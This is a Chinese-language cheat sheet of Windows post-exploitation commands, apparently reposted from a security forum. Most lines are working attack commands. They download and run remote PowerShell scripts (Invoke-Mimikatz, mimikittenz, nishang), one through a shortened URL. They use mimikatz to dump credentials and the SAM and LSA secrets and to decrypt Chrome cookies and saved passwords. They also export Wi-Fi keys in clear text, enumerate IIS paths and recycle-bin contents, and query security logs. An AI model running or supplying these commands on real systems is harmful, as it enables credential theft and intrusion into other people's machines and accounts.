powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
tips:powershell 默认windows visa后才有
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit
netsh wlan export profile interface=无线网络连接 key=clear folder=C:\
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
C:\Windows\System32\drivers\etc\hosts windows7 windows2008等
C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS windows2003位置
提权情况下或者过了uac的情况下直接type一下就行了
iis-web路径
iis6 =========>cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
iis7 ,8 =======>appcmd.exe
%systemroot%/system32/inetsrv/appcmd.exe list site ——列出网站列表
%systemroot%\system32\inetsrv\appcmd.exe list vdir ——列出网站物理路径
当然你也可以用mimikatz
mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exit
$I
开头的文件保存的是路径信息 $R
保存的是文件FOR /f "skip=1 tokens=1,2 delims= " %c in ('wmic useraccount get name^,sid') do dir /a /b C:$Recycle.Bin%d\ ^>%c.txt
$Recycler = (New-Object -ComObject Shell.Application).NameSpace(0xa);foreach($file in $Recycler.items()){$file.path;$file.ExtendedProperty("{9B174B33-40FF-11D2-A27E-00C04FC30871} 2")+''+$file.name;$file.Type}
%localappdata%\google\chrome\USERDA~1\default\LOGIND~1
%localappdata%\google\chrome\USERDA~1\default\USERDA~1
%localappdata%\google\chrome\USERDA~1\default\cookies
chrome的用户信息保存在本地文件为sqlite 数据库格式
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit //读chrome密码
powershell "IEX (New-Object Net.WebClient).DownloadString(' https://github.com/samratashok/nishang/tree/master/Gather/Gather/Get-Information.ps1'); Get-Information"
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz
sqlserver密码获取工具Get-MSSQLCredentialPasswords.psm1 //未测
cscript c:\WINDOWS\system32\eventquery.vbs /fi "Datetime eq 06/24/2015,01:00:00AM-06/24/2015,10:00:00AM" /l Security /V #查看SECURITY日志 2015-6.24 上午1点-上午10点日志
wevtutil qe security /rd:true /f:text /q:"*[system/eventid=4624 and 4623 and 4627]" #查询所有登录、注销相关的日志语法
作者:小城原文地址:https://xz.aliyun.com/t/1765
如有侵权,请联系删除
推荐阅读